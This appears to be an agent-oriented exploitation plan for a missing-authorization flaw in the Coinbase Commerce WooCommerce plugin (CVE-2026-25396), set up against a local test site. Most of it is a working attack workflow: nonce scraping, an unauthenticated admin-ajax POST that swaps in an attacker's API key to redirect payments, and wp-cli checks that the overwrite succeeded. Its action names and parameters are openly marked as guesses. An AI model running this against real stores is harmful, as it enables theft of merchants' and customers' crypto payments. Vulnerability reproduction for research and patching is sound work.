Coinbase Commerce – Crypto Gateway for WooCommerce <= 1.6.6 - Missing Authorization

This research plan targets CVE-2026-25396, a missing authorization vulnerability in the Coinbase Commerce plugin for WooCommerce. Since source code is not provided, this plan focuses on identifying the specific vulnerable AJAX or init handler and exploiting it to perform unauthorized configuration changes.

---

1. Vulnerability Summary

The Coinbase Commerce – Crypto Gateway for WooCommerce plugin (<= 1.6.6) fails to implement proper capability checks (e.g., current_user_can('manage_options')) on at least one function exposed via WordPress hooks. This allows unauthenticated attackers (AV:N/AC:L/PR:N) to trigger internal plugin logic. Given the CVSS of 5.3 (Medium), the "unauthorized action" likely involves modifying plugin settings, resetting connection states, or manipulating non-critical metadata.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php (most likely) or /wp-admin/admin-post.php.
• Vulnerable Action: Likely a wp_ajax_nopriv_* handler or a function hooked to admin_init that lacks a current_user_can check.
• Action Names (Inferred):
  • coinbase_commerce_save_settings
  • commerce_coinbase_update_api_key
  • coinbase_commerce_disconnect
  • coinbase_commerce_verify_api_key
• Payload: A POST request containing a malicious action parameter and configuration values (e.g., api_key, shared_secret).

3. Code Flow (Inferred)

1. Registration: The plugin registers an action:
   add_action('wp_ajax_nopriv_ACTION_NAME', 'handler_function');
2. Execution: When admin-ajax.php is called with action=ACTION_NAME, WordPress executes handler_function.
3. Vulnerability: handler_function performs a sensitive operation (like update_option) without:
   • Verifying the user has manage_woocommerce or manage_options capabilities.
   • Verifying a valid CSRF nonce.
4. Sink: The input reaches update_option('woocommerce_commerce-coinbase_settings', ...) or similar.

4. Nonce Acquisition Strategy

If the vulnerable handler requires a nonce (even if it misses the capability check), follow this protocol:

1. Identify Script Localization: The plugin likely localizes a nonce via wp_localize_script.
2. Locate Triggering Page: Coinbase settings usually appear in WooCommerce > Settings > Payments > Coinbase Commerce. However, if the nonce is intended for unauthenticated use (a nopriv action), it may appear on the checkout page or a specific product page.
3. Shortcode Discovery: Use wp-cli to find shortcodes:
   wp eval "grep -r 'add_shortcode' wp-content/plugins/commerce-coinbase-for-woocommerce/"
4. Create Test Page:
   wp post create --post_type=page --post_status=publish --post_title="Coinbase Test" --post_content="[coinbase_shortcode_found]"
5. Extract via Browser:
   • browser_navigate("http://localhost:8080/coinbase-test")
   • browser_eval("window.coinbase_commerce_params?.nonce || window.coinbase_ajax?.nonce") (Inferred JS keys).

5. Exploitation Strategy

The goal is to update the plugin's API key to point to an attacker-controlled Coinbase Commerce account, redirecting payments.

Step 1: Discover Vulnerable Action
The agent must first identify the vulnerable action name by inspecting the plugin source:
grep -r "wp_ajax_nopriv" wp-content/plugins/commerce-coinbase-for-woocommerce/

Step 2: Construct the Request
Once the action and parameters are identified (e.g., action=coinbase_save_api and parameter api_key):

• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Payload:

  action=IDENTIFIED_ACTION&api_key=ATTACKER_KEY&nonce=EXTRACTED_NONCE
  

6. Test Data Setup

1. Install WooCommerce: The plugin requires WooCommerce to be active.
2. Configure Gateway: Enable "Coinbase Commerce" in WooCommerce payment settings.
3. API Key Initial State: Set a dummy API key (e.g., ORIGINAL_KEY_12345) via the UI or WP-CLI:
   wp option update woocommerce_commerce-coinbase_settings '{"api_key":"ORIGINAL_KEY_12345"}' --format=json

7. Expected Results

• HTTP Response: A 200 OK response, potentially returning {"success": true} or 1.
• State Change: The database option containing the API key is overwritten with the attacker's value.

8. Verification Steps

After sending the exploit request, verify via wp-cli:

# Check if the API key in the options table has changed
wp option get woocommerce_commerce-coinbase_settings --format=json

If the api_key value matches ATTACKER_KEY, the exploitation is successful.

9. Alternative Approaches

If no wp_ajax_nopriv actions are found, check for:

1. admin_init hooks:
   grep -r "add_action.*admin_init" wp-content/plugins/commerce-coinbase-for-woocommerce/
   Verify if these handlers check current_user_can. admin_init runs for any request to /wp-admin/admin-ajax.php, even for unauthenticated users.
2. Direct Setting Updates:
   Check if the plugin uses register_setting without a proper sanitize_callback or permission_callback in a REST context.
3. Webhook Handler:
   Check if the webhook handler (/wc-api/coinbase_commerce/) can be used to manipulate order statuses without a valid Coinbase signature.